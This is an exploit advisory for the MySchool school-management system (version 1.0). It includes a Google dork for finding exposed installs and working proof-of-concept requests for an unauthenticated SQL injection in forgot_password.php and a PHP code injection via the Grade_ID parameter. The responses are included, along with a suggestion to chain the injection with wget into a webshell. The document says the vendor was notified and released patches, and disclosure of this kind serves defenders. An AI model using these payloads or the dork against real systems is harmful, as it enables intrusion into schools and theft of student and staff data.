@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > MySchool System - Multiple Vulnerabilities .:. Google Dorks .:. inurl:web/teacher_app .:. Date:Jan 20, 2025 .:. Exploit Author: bRpsd .:. Contact: cy[at]live.no .:. Vendor -> https://myschool-system.com/ .:. Vendor has been notified and has released patches .:. Affected Version: 1.0 .:. Tested on > macOS [*nix Darwin Kernel], on local xampp .:. Big thanks to wa-3, Telegram: @wa0_3 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############# |DESCRIPTION| ############# "MySchool is a multi-purpose online school management software, an innovative, powerful and easy-to-use interface used by hundreds of educational institutions such as schools, colleges, universities...etc. - With the passage of time, new technologies occur in managing the educational process, so it is important for educational institutions to manage all the data and work in a professional manner to save both time and money. - MySchool has been used in many educational institutions in Egypt and the Gulf countries since 2007. We are constantly developing our programs to provide the best solutions and services to our customers. As a company, we are well known to the customers we serve, but we want to go beyond our current customer base to potential customers from schools, colleges and institutes and increase awareness of the MySchool program worldwide. - My School is the best school management system. We have developed a system that is required by all education systems around the world." Vulnerability 1: Unauthenticated SQL Injection Types: boolean-based blind,error-based, time-based blind Path: localhost/forgot_password.php Vul Parameter: User [POST] Vulnerable Code: ################################################################################################# if ($_SERVER['REQUEST_METHOD']== "POST") {       $Res = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM users where User ='$User' "); ################################################################################################# Proof of concept: POST http://localhost/forgot_password.php User=' Response Error: Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1 in /forgot_password.php:38 Stack trace: #0 /forgot_password.php(38): mysqli_query() #1 {main} thrown in /forgot_password.php on line 38 NOTE: This isn't the only SQLi, there's plenty in the system Im too lazy to list them all Example: /ajax/get_grades.php?schoolId=2'&yearId=24 =========================================================================================== Vulnerability 2: Authenticated Server Side Code Injection - PHP Code Injection Note: Authentication can be easily acquired from the former SQLi Path: localhost/btn_01.php Vul Parameter: Grade_ID [GET] Vul Parameter2: Subject_ID [GET] Payload Used: ";phpinfo();$var=" Possible payload for RCE: file_put_contents combined with wget to have a webshell Vulnerable code: $data = array($MemberActive, $Year_List_Calc_St, $Sub_Level, $CP_Type, $success, $Division_ID, $Room_ID, $Grade_ID, $Student_Group_ID, $S_User, $Sub_UserID); return ($data); if (!$success) { if ($MS_Option['cacheEnabled1']) { $today = date("Y-m-d"); $cacheFactor = $today . "-" . $S_UserName . "-" . $Original_User . "-" . $S_Password . "-" . $_SESSION['Sub_Level']; $htmlCacheFileName = md5($cacheFactor); if (file_exists("cache/login/$htmlCacheFileName")) { $fileContent2 = file_get_contents("cache/login/$htmlCacheFileName"); eval('$xl = ' . $fileContent2 . ';'); } } } Proof of concept: POST https://localhost/btn_01.php?CurrentLine=1&page_no=1&sort=ID&Page_ID=15340&Grade_ID=%22%3Bphpinfo%28%29%3B%24var%3D%22&Subject_ID=&stopEnablePanel=1 HTTP/1.1 host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------56011178726845606972928094726 Content-Length: 555 Origin: https://localhost Connection: keep-alive Referer: https://localhost/cp Cookie: PHP84SESSID=b14675e2e1fecf65008c200e665c743e Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------56011178726845606972928094726 Content-Disposition: form-data; name="skipLastVisited" undefined -----------------------------56011178726845606972928094726 Content-Disposition: form-data; name="Location_CP_Type" undefined -----------------------------56011178726845606972928094726 Content-Disposition: form-data; name="subMenuId" undefined -----------------------------56011178726845606972928094726 Content-Disposition: form-data; name="do" view -----------------------------56011178726845606972928094726-- Response: HTTP/1.1 200 OK Date: Wed, 29 Jan 2025 15:19:00 GMT Server: Apache X-Powered-By: PHP/8.4.3 X-XSS-Protection: 0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Upgrade: h2 Connection: Upgrade, Keep-Alive Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Content-Type: text/html; charset=utf-8 content-length: 373447 <title>PHP 8.4.3 - phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head> <body><div class="center"> <table> <tr class="h"><td> <a href="https://www.php.net/"><h1 class="p">PHP Version 8.4.3</h1> </td></tr> </table> <table>... ========================================================================================== There is also CSRF,XSS,External Redirect but I don't see them as a real threat to be honest.